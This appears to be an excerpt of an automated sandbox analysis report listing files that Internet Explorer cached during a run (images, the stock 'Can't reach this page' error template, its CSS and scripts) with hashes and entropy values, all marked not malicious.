                                        Size (bytes):3093
                                        Entropy (8bit):7.883981124809078
                                        Encrypted:false
                                        SSDEEP:96:Qf7EjVwJE8Bk2ppZBt6s5sdskI5Gxo9y3:QjKwDBk2ppZrisJny3
                                        MD5:7C5FA8940D22DC4F3D60519B642B8C28
                                        SHA1:8D0F3497374593EE162727BE3A81915A55EF5578
                                        SHA-256:68A4A72586D9238169A10DE1D1FF65383240747BF93F88F527942D0E9B019F92
                                        SHA-512:DBBA752921646D24051236E2DD7CFFB3B611E3CAF3D300EC948FC1D8B51036D7B6E97E4590340306E8A2E3770088CE21D9BE553AAF0562E703067B06E4972699
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AAOgLtL[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                        Category:dropped
                                        Size (bytes):12204
                                        Entropy (8bit):7.760356414393578
                                        Encrypted:false
                                        SSDEEP:192:Q2ocxYvdubJzbjF4rcDHiz3U68cXNsT0t16iDUVVH6Gb029cbDc1+fCYyGqqpo2r:NosSuF3WggFk0tgioVV0dCYyGXn11sA/
                                        MD5:809C75ECB371E6428E0D21641C6758FD
                                        SHA1:06EF08CCC013EFF1AAD201C7F1BD3C288350B274
                                        SHA-256:3B7A81B0CEC9930FDAF2EE0BDCBD475ED69656DF7237B4795C8B021E3A71A725
                                        SHA-512:52D3EDCD559F525D6E941E63D88CC243A0F11212D7172AA089B672505D9DB94DB68BE1300E9BAB00D150E1E644891999483FFBDF0791E8E2EE8ECBA66E25D81F
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AAOgbmq[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                        Category:dropped
                                        Size (bytes):6289
                                        Entropy (8bit):7.851523332145787
                                        Encrypted:false
                                        SSDEEP:96:QfQErg7WA8UKQ9FQeAAdE7XqMnyVvzoTUtmnw66zfMcg84pGEuji9zoybBbqr:Qoag7WA8liF669N36eEtjpG9jFY2
                                        MD5:07F426B9CCD868F4A649262096340195
                                        SHA1:0FBB15A464AA610660FA0C4FC0DC541AF1714797
                                        SHA-256:D2CB2DD7DAE25A68EFB5F3365A6ECCF7D1754A497FA0CB933DF6753E395A5CB9
                                        SHA-512:5E79975D852BF819A942CD6FAE7744AD75A081EC1562F4F243CD01B86B5CCECEF7976D239AED3D30A215922D5CD239F329BA2E970364365571C8CB7CDD833B2C
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AAOggwL[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                        Category:dropped
                                        Size (bytes):12998
                                        Entropy (8bit):7.957875205331213
                                        Encrypted:false
                                        SSDEEP:384:bOhTptS/mgGPq4AQF+2SK2Fdtlr0voY49wNPci77P:bOhbSugGPq4zFotlr0uIP
                                        MD5:1D942C6E3EDD1A02F198321F9F653842
                                        SHA1:CB8A9BCC50B7001222AA6ED0070701A91E8D48E1
                                        SHA-256:8C71199E78444BF4AF8F2FB06A29084CB7A3B79605DC8C7027A01AE146BCDCC2
                                        SHA-512:245C76AFABA723A5F404DBEF1FDAA3A35B97D58B9C0A5AF4467D64E4821A0B8A9CF8BCF4E46145A9E39D224C996AC06A4D625BDF21C0DBD6C5C027B70AA3D37E
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AAOguTA[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                        Category:dropped
                                        Size (bytes):8913
                                        Entropy (8bit):7.92704245333277
                                        Encrypted:false
                                        SSDEEP:192:Qo4x+X1wBOZURMxGfEa2Nbe/e33DLBH86cg2w:bnXqB0sVEa2Y/03xH8zw
                                        MD5:6A4DF2C42DA5EA53EA4B3A6CD2EDB5D2
                                        SHA1:10B2E4A7F7730E8D6BF42F121D42432C26CFC089
                                        SHA-256:D33985B0529FA6B886C455C39EE3946F11CB18336F038C72BC710C6D36CFCF03
                                        SHA-512:062B790B4B455BE51348700A0065E5C35D13A14ECFADB4AFFBF51578FA03D77BB579D745C031FA84C0E612E30729E91FABB4D626178240A868F74F7C05782D39
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AAuTnto[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):777
                                        Entropy (8bit):7.619244521498105
                                        Encrypted:false
                                        SSDEEP:12:6v/7/+Qh6PGZxqRPb39/w9AoWC42k5a1lhpzlnlA7GgWhZHcJxD2RZyrHTsAew9:++RFzNY9ZWcz/ln2aJ/Hs0/ooXw9
                                        MD5:1472AF1857C95AC2B14A1FE6127AFC4E
                                        SHA1:D419586293B44B4824C41D48D341BD6770BAFC2C
                                        SHA-256:67254D5EFB62D39EF98DD00D289731DE8072ED29F47C15E9E0ED3F9CEDB14942
                                        SHA-512:635ED99A50C94A38F7C581616120A73A46BA88E905791C00B8D418DFE60F0EA61232D8DAAE8973D7ADA71C85D9B373C0187F4DA6E4C4E8CF70596B7720E22381
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AAud6Gv[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):356
                                        Entropy (8bit):7.101459310090333
                                        Encrypted:false
                                        SSDEEP:6:6v/lhPahmpAKG4NDBbCySVUc3/qF9Hio9hbifyZQw+bS2LblMid1Rc9ruhiFp:6v/73bCLVYHio9h8kQw+7BMW1W9rAir
                                        MD5:A94D5FFB98CBCA323E6AEA6A826B9ACF
                                        SHA1:D4F20C419292258A27A06511955A02400C767723
                                        SHA-256:7527C0E97B871894A7AC475D714D51E82F51BB965848DCD03657B12D5808BCAB
                                        SHA-512:D2B0D68C085457161F612B50508548D9FD6F7F48DE74AEC8009C65375A0CF0D58469BC8B93AC2705B4AB4A0F0D3FE07E8207500AD896FFC676D7D50649643A7D
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\BB15AQNm[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                        Category:dropped
                                        Size (bytes):29565
                                        Entropy (8bit):7.9235998300887145
                                        Encrypted:false
                                        SSDEEP:384:I1cMsjB7+C2bbAEB2SUZRT+kXoMRRJhp5xvHapIzf7m41tgaYi9PIVKnHNVMP2Nm:IHsjkC2YEB2SUPTT48FPHTgf3VKn2Uc
                                        MD5:6B79D1438D8EFAF3B8DE6163107CEC71
                                        SHA1:E54E651A8A0FDAFCAD60B137D806D8CEC2F769C0
                                        SHA-256:2F00C9B0C23EE995091A90ACC7A8FA3AA773612A464F558D78664636C8B7B8D8
                                        SHA-512:745B822F9E21DB98B909F3AE762C439C376A35AD5C08655861B05539ACD5C47BCDCF24FAB2FB5A56712BC3BEDE6493FD5152E92D065AC5E9ECCE2DF93C4B78B7
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\BB1fdtSt[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):438
                                        Entropy (8bit):7.245257101036661
                                        Encrypted:false
                                        SSDEEP:12:6v/7DHVT2T6ESAN2ISAy22UaU8Pa7+/LB:4Tq0AN2IjyPaqV
                                        MD5:3F46112E8E54A82D0D7F8883CF12A86F
                                        SHA1:AA1A3340F167A655D0A0A087D0F6CBF98026296C
                                        SHA-256:E447211712478A81E419A9794678B6377AE3ACA057DEA78FC9EF6A971E652CFB
                                        SHA-512:EBBF357EF6B388E4BD1B261D51DE923D15DBF3AC4740874BEBDEF336BB8133C3B63AEA9D8D95D2D1A044F6E43B7DD654586661462C9239E4FFA6B8328E6B49A6
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\BB7hg4[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):470
                                        Entropy (8bit):7.360134959630715
                                        Encrypted:false
                                        SSDEEP:12:6v/7TIG/Kupc9GcBphmZgPEHfMwY7yWQtygnntrNKKBBN:3KKEc9GcXhmZwM9LtyGJKKBBN
                                        MD5:B6EA6C62BAEBF35525A53599C0D6F151
                                        SHA1:4FFEFB243AAEC286D37B855FBE33C790795B1896
                                        SHA-256:71CC7A3782241824ACDC2D6759E455399957E3C7C9433A1712C3947E2890A4D4
                                        SHA-512:0E4E87A66CF6E01750BC34D2D1EC5B63494A7F5C4B831935DD00E1D825CDB1CFD3C3E90F29D1D4076E7F24C9C287E59BE23627D748DB05FB433A3A535F115464
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\BB7hjL[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):462
                                        Entropy (8bit):7.383043820684393
                                        Encrypted:false
                                        SSDEEP:12:6v/7FMgL0KPV1ALxcVgmgMEBXu/+vVIIMhZkdjWu+7cW1T4:kMgoyocsOmIZIl+7cW1T4
                                        MD5:F810C713C84F79DBB3D6E12EDBCD1A32
                                        SHA1:09B30AB856BFFDB6AABE09072AEF1F6663BA4B86
                                        SHA-256:6E3B6C6646587CC2338801B3E3512F0C293DFF2F9540181A02C6A5C3FE1525A2
                                        SHA-512:236A88BD05EAF210F0B61F2684C08651529C47AA7DCBCD3575B067BEDCA1FBEE72E260441B4EAD45ABE32354167F98521601EA21DDF014FF09113EC4C0D9D798
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\BBK9Hzy[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):480
                                        Entropy (8bit):7.323791813342231
                                        Encrypted:false
                                        SSDEEP:12:6v/7BusWIjbykLNgdQLPhgZPwb6txC3nUPuZZcb:MW6bykxgSh6a6TCStb
                                        MD5:163E7CEBA4224A9D25813CD756D138CC
                                        SHA1:062FFF66A1E7C37BAE1ECE635034A03C54638D50
                                        SHA-256:14525F17E552171DEE6D57C932287048185BE36D9AC25DA79CB02AD00657DEAF
                                        SHA-512:C37D77C1414B75CE6E3A90087B3C1E9D57AF6BCA4C140F1F4F43503D89C849EE1143315260A4DF92F1DD273305C15121FF199C04E946FA3BBD98B9B1D6636069
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\BBX2afX[2].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):879
                                        Entropy (8bit):7.684764008510229
                                        Encrypted:false
                                        SSDEEP:24:nbwTOG/D9S9kmVgvOc0WL9P9juX7wlA3lrvfFRNa:bwTOk5S96vBB1jGwO3lzfxa
                                        MD5:4AAAEC9CA6F651BE6C54B005E92EA928
                                        SHA1:7296EC91AC01A8C127CD5B032A26BBC0B64E1451
                                        SHA-256:90396DF05C94DD44E772B064FF77BC1E27B5025AB9C21CE748A717380D4620DD
                                        SHA-512:09E0DE84657F2E520645C6BE20452C1779F6B492F67F88ABC7AB062D563C060AE51FC1E99579184C274AC3805214B6061AEC1730F72A6445AEBDB7E9F255755F
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\BBY7ARN[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):779
                                        Entropy (8bit):7.670456272038463
                                        Encrypted:false
                                        SSDEEP:24:dYsfeTaIfpVFdpxXMyN2fFIKdko2boYfm:Jf5ILpCyN29lC5boD
                                        MD5:30801A14BDC1842F543DA129067EA9D8
                                        SHA1:1900A9E6E1FA79FE3DF5EC8B77A6A24BD9F5FD7F
                                        SHA-256:70BB586490198437FFE06C1F44700A2171290B4D2F2F5B6F3E5037EAEBC968A4
                                        SHA-512:8B146404DE0C8E08796C4A6C46DF8315F7335BC896AF11EE30ABFB080E564ED354D0B70AEDE7AF793A2684A319197A472F05A44E2B5C892F117B40F3AF938617
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\BBkwUr[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):436
                                        Entropy (8bit):7.255906495097201
                                        Encrypted:false
                                        SSDEEP:6:6v/lhPahm/BBjoPHhOVDqpp05cMxyHtGUmmozY7JE3R+hRMCzRPasXQc01UaVesl:6v/7MHQg25b8Ht3VEMNQ2w5
                                        MD5:01B5E74F991A886215461BF0057008C7
                                        SHA1:6A7347C3559814722D7AA4D491A0D754E157FCC5
                                        SHA-256:DB8A0C0A44AEE824F689A942D99802F95D7950758CB0739C7F179624A592CD51
                                        SHA-512:17820A7C90B35B0E45D0A07F5445D8C97BFD3098FD9E0F0283CD6CFC1DB2B33C651924D2F04EF398C147CEB8D7DEA3F591DBC19F9039279407C4E4231AC5F5B7
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\NewErrorPageTemplate[1]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1612
                                        Entropy (8bit):4.869554560514657
                                        Encrypted:false
                                        SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                                        MD5:DFEABDE84792228093A5A270352395B6
                                        SHA1:E41258C9576721025926326F76063C2305586F76
                                        SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                                        SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\NewErrorPageTemplate[2]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1612
                                        Entropy (8bit):4.869554560514657
                                        Encrypted:false
                                        SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                                        MD5:DFEABDE84792228093A5A270352395B6
                                        SHA1:E41258C9576721025926326F76063C2305586F76
                                        SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                                        SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\dnserror[1]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2997
                                        Entropy (8bit):4.4885437940628465
                                        Encrypted:false
                                        SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                                        MD5:2DC61EB461DA1436F5D22BCE51425660
                                        SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                                        SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                                        SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\dnserror[2]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2997
                                        Entropy (8bit):4.4885437940628465
                                        Encrypted:false
                                        SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                                        MD5:2DC61EB461DA1436F5D22BCE51425660
                                        SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                                        SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                                        SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\down[1]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                        Category:dropped
                                        Size (bytes):748
                                        Entropy (8bit):7.249606135668305
                                        Encrypted:false
                                        SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                        MD5:C4F558C4C8B56858F15C09037CD6625A
                                        SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                        SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                        SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\errorPageStrings[1]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):4720
                                        Entropy (8bit):5.164796203267696
                                        Encrypted:false
                                        SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                        MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                        SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                        SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                        SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\httpErrorPagesScripts[1]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):12105
                                        Entropy (8bit):5.451485481468043
                                        Encrypted:false
                                        SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                        MD5:9234071287E637F85D721463C488704C
                                        SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                        SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                        SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\log[1].gif
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:GIF image data, version 89a, 1 x 1
                                        Category:dropped
                                        Size (bytes):35
                                        Entropy (8bit):3.081640248790488
                                        Encrypted:false
                                        SSDEEP:3:CUnl/RCXknEn:/wknEn
                                        MD5:349909CE1E0BC971D452284590236B09
                                        SHA1:ADFC01F8A9DE68B9B27E6F98A68737C162167066
                                        SHA-256:796C46EC10BC9105545F6F90D51593921B69956BD9087EB72BEE83F40AD86F90
                                        SHA-512:18115C1109E5F6B67954A5FF697E33C57F749EF877D51AA01A669A218B73B479CFE4A4942E65E3A9C3E28AE6D8A467D07D137D47ECE072881001CA5F5736B9CC
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\nrrV27452[1].js
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:ASCII text, with very long lines, with no line terminators
                                        Category:dropped
                                        Size (bytes):90611
                                        Entropy (8bit):5.421500848741912
                                        Encrypted:false
                                        SSDEEP:1536:uEuukXGs7RiUGZFVgRdillux5Q3Yzudp9o9uvby3TdXPH6viqQDkjs2i:atiX0di3p8urMfHgjg
                                        MD5:1EB648466B92897E80D5F3A64D02C011
                                        SHA1:624EE532FED7CCBC60DF3433DC3369AADE0F9226
                                        SHA-256:1C9605652D3D876ACA145E7F46F92E669E6A92C4AB27A1CBB454882BD58A1386
                                        SHA-512:1B7CEED799A6994991DCB8938A3B00BD64E1CEC17EC0775FC1CE844604805FEB20BEC3D72823730712BD0CB45B278F30FDD2CBA7319AD605323F667F39BF801C
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\otFlat[2].json
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):12282
                                        Entropy (8bit):5.246783630735545
                                        Encrypted:false
                                        SSDEEP:192:SZ1Nfybp4gtNs5FYdGDaRBYw6Q3OEB+q5OdjM/w4lYLp5bMqEb5PenUpoQuQJYQj:WNejbnNP85csXfn/BoH6iAHyPtJJAk
                                        MD5:A7049025D23AEC458F406F190D31D68C
                                        SHA1:450BC57E9C44FB45AD7DC826EB523E85B9E05944
                                        SHA-256:101077328E77440ADEE7E27FC9A0A78DEB3EA880426DFFFDA70237CE413388A5
